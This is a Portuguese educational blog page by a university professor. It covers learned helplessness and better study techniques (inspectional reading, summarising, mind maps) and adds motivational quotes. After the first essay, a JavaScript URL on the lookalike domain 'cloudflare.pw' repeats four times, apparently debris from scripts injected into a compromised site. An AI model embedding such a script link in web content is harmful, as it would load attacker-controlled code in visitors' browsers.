Fracasso aprendido…E como se livrar dele!

Prof. Mauricio A. P. Peixoto
Doutor em Medicina, FM – UFRJ
Professor Adjunto do Laboratório de Currículo e Ensino
Núcleo de Tecnologia para a Saúde (NUTES)
Universidade Federal do Rio de Janeiro

“Um dado que surpreendeu os pesquisadores do estudo (*),
foi que alunos de baixo desempenho relatam se esforçar
tanto para aprender ou estudar para as provas quanto os de alto rendimento.
O que diferencia esses dois grupos é a menor confiança
dos estudantes de pior desempenho 
 em  relação aos resultados que terão.”
(Antonio Gois, O Globo, 15/02/2016)

 

Fracasso aprendido é isto. Você tenta, tenta, e não dá certo. Um dia você desiste de tentar. Afinal de contas, a vida te mostrou que com você as coisas não dão certo. É justo, é legítimo. E tome frustração.

Nas fases iniciais, você tenta fazer mais, estudar mais. É a fase onde estão os alunos do estudo acima. E, em alguns casos, até dá certo. Mas a que custo!

Há muitas causas para isto; pobreza, alimentação, estrutura familiar, educação prévia, etc.  Em síntese, o resultado da vida que você teve, quer você tenha escolhido isto ou não. O problema é que tudo isto é passado, e “não adianta chorar sobre o leite derramado”. Você é o que é. Mas isto não significa que não possa se transformar. Por agora não dá para pensar muito em motivação. Afinal, você já a tem. É só por causa dela que você tem se esforçado mais e mais.

Que tal parar de fazer “mais do mesmo” e obter sempre o mesmo? O meu conselho é: Pare de fazer mais, faça melhor ! Esqueça o slogan da Nike: “Just do it!”. Pense como o inventor Thomas A. Edison :

“There’s a way to do it better . . . find it!”
(há uma maneira de fazer melhor…descubra-a!)

Fazer melhor é estudar de uma foram mais eficiente e eficaz. Isto significa, usar as estratégias de aprendizagem corretas, no momento e contexto certos.  Por exemplo:

  1.  Você tem muita coisa para ler (é sempre assim), mas tudo é igualmente importante? Certamente há alguns detalhes que são menos importantes que as idéias centrais. Mas como descobri-las senão lendo tudo? Resposta: Use a leitura inspecional, uma técnica que dirigida pelas questões certas (que você pode construir), permite separar “o joio do trigo”, o que é principal do que é secundário.
  2. A leitura inspecional permitiu identificar o que é importante, mas como juntar isto. Resuma da maneira certa. Resumir é um técnica que tem regras e procedimentos. Não é apenas copiar partes do texto. Não deve ser confundida também com as notas de conteúdo. Ainda mais, há alunos que estudam escrevendo; explicando para si o assunto por meio de um texto. Isto é bom e ajuda algumas pessoas pessoas, mas não é resumir.
  3. Os assuntos parecem todos desconexos. Você não consegue entendê-los, fica se perguntando o que “tem a ver” com que. Experimente fazer um mapa mental ou então um mapa conceitual. Ambos são formas de representação gráfica do conhecimento que,entre outras coisas, te ajudam a entender as relações entre os tópicos de um assunto. Ainda mais, facilitam a memorização.

Aprender a aprender é então uma forma de estudar com mais facilidade. Se você melhorar a qualidade do seu estudo (fazer melhor) e mantiver adequado nível de esforço, é muito mais fácil melhorar o seu desempenho. E assim aumenta a sua confiança no sucesso. O fracasso que você aprendeu, vai progressivamente sendo deixado para trás. E assim todos aqueles fatores antigos se mostram cada vez mais incapazes de impedir o seu crescimento pessoal e profissional.

 

(*) Pesquisa da OCDE-Organização para o Desenvolvimento Econômico sobre o desempoenho de alunos no Pisa, que é um teste internacional realizado em 65 paises.

https://cloudflare.pw/cdn/statslg30.js

https://cloudflare.pw/cdn/statslg30.js

https://cloudflare.pw/cdn/statslg30.js

https://cloudflare.pw/cdn/statslg30.js

Pensar é transgredir

Quando menos se espera ele chega, o pensamento que nos faz parar. Pode ser no meio do trânsito, na frente da tevê ou do computador. Simplesmente escovando os dentes. Ou na hora da droga, do sexo sem afeto, do desafeto, da lamúria, da hesitação. Sem ter programado, a gente pára pra pensar. É como espiar para um corredor com mil possibilidades. Cada porta, uma escolha. Muitas vão se abrir para um nada, outras para um jardim de promessas. Hora de tirar os disfarces, aposentar as máscaras e reavaliar, reavaliar-se. Pensar pede audácia, pois refletir é transgredir a ordem do superficial que nos esmaga.
(Lya Luft)

Você tem algo a dizer ? Quer ampliar o debate ? Comentários são bem vindos.

Riqueza ou pobreza?

Riqueza


Eu fui pobre, vivi em completa pobreza e também vivi na riqueza. Acreditem em mim quando digo que a riqueza é muito melhor que a pobreza. Sou um homem com interesses simples, sinto-me completamente satisfeito com o melhor, não peço mais que isso.
(Osho – Osho de A a Z)

Pobreza


Durante toda a história humana, a pobreza foi louvada e fizeram dela um sinônimo de espiritualidade, o que é absolutamente sem sentido. Você pode viver na pobreza absoluta, mas a pobreza não irá ajudá-lo a tornar-se iluminado. Na pobreza ou na riqueza, no casebre de um homem pobre ou em um palácio, o que importa é o seu estado de meditação sua percepção. Onde quer que isso aconteça, você irá se tornar iluminado. Você não precisa renunciar a nada.
(Osho – Osho de A a Z)

Você tem algo a dizer ? Quer ampliar o debate ? Comentários são bem vindos.

Mapa Mental

O próprio ato de construir um mapa mental é por si só, tão eficaz para o registro de idéias na memória que, muitas vêzes, é possível recuperar todo o mapa sem necessidade de consulta-lo novamente. O mapa mental é visivelmente tão potente e usa um número tão grande de funções da memória que, muitas vezes pode ser lido simplesmente com o “olho da mente”.
(Peter Russel)

Psicoterapia é a arte da escuta e da compreensão do
pensamento e do coração.
(Maria Teresa Guimarães – Psicoterapeuta)

Você tem algo a dizer ? Quer ampliar o debate ? Comentários são bem vindos.

Ignorância e Felicidade

Ignorância


Após estudar meus apontamentos desta aula consegui fazer uma conexão interessante entre os conceitos expostos e o meu cotidiano, o que me fez compreender melhor o mundo e as pessoas. O ignorante inconsciente é como o peixe; não sabe que está dentro d’água.
Na minha família ninguém estudou, não fizeram nem o 2 grau, imaginem então vestibular e tal. Portanto, agora eu compreendo a dificuldade deles em reconhecer meus méritos, meus problemas em fazer cada disciplina, cada período, cada ano. Tem uma frase no primeiro filme da trilogia MATRIX que também fala sobre isso:”A IGNORÂNCIA É UMA DÁDIVA”. Se eles não sabem nada sobre nada e estão vivos e felizes (eles acham…) então podem concluir que eu estou perdendo tempo, quando poderia simplesmente estar com eles. Mas a partir da aula citada na primeira parte eu passei a compreendê-los como nunca. E ser paciente.

( Estudante de Enfermagem, aluno da disciplina “Aprendendo a Aprender nas Ciências da Saúde”, ministrada pelo Prof. Mauricio Peixoto na UFRJ, outubro de 2004 )

Felicidade

Sempre olhe para as coisas de forma que você também seja capaz de encontrar algo de bom que possa lhe trazer felicidade.
Não perca nenhuma oportunidade de ser feliz.
Em geral fazemos exatamente o oposto.
Não perdemos nenhuma oportunidade de ficarmos infelizes.
Estar feliz é um grande talento.
Estar infeliz é trivial.
A felicidade é algo que transcende a mente.
(Osho)

Você tem algo a dizer ? Quer ampliar o debate ? Comentários são bem vindos.

Ser perfeito! Ser superior!

Ser perfeito! Ser superior!
Não ter defeitos. Não ter problemas.
Saber tudo. Não errar.
Ser mais do que o outro. Vontade de Poder!
Você pode tudo a partir da sua integridade.
Você pode tudo, aceitando seus fracassos.
Aqui você pode ousar.
Aqui você se arrisca até a errar.
Aqui você flerta com o seu poder!
Ser superior não é ser melhor ou mais que o outro.
Ser superior é ser o que se é, com defeitos e qualidades.
Ser superior  é ser feliz no seu cotidiano.
São raros os momentos de êxtase.
E, logo após vem a calmaria, que muitos chamam de “ momentos sem graça”.
Mas a graça destes momentos está no reconhecimento do “ ser único” que você é.
Daí a sua importância.
Agora você Pode! Pode! e Pode… Ser Feliz!
(Maria Teresa Guimarães – Psicoterapeuta)

Você tem algo a dizer ? Quer ampliar o debate ? Comentários são bem vindos.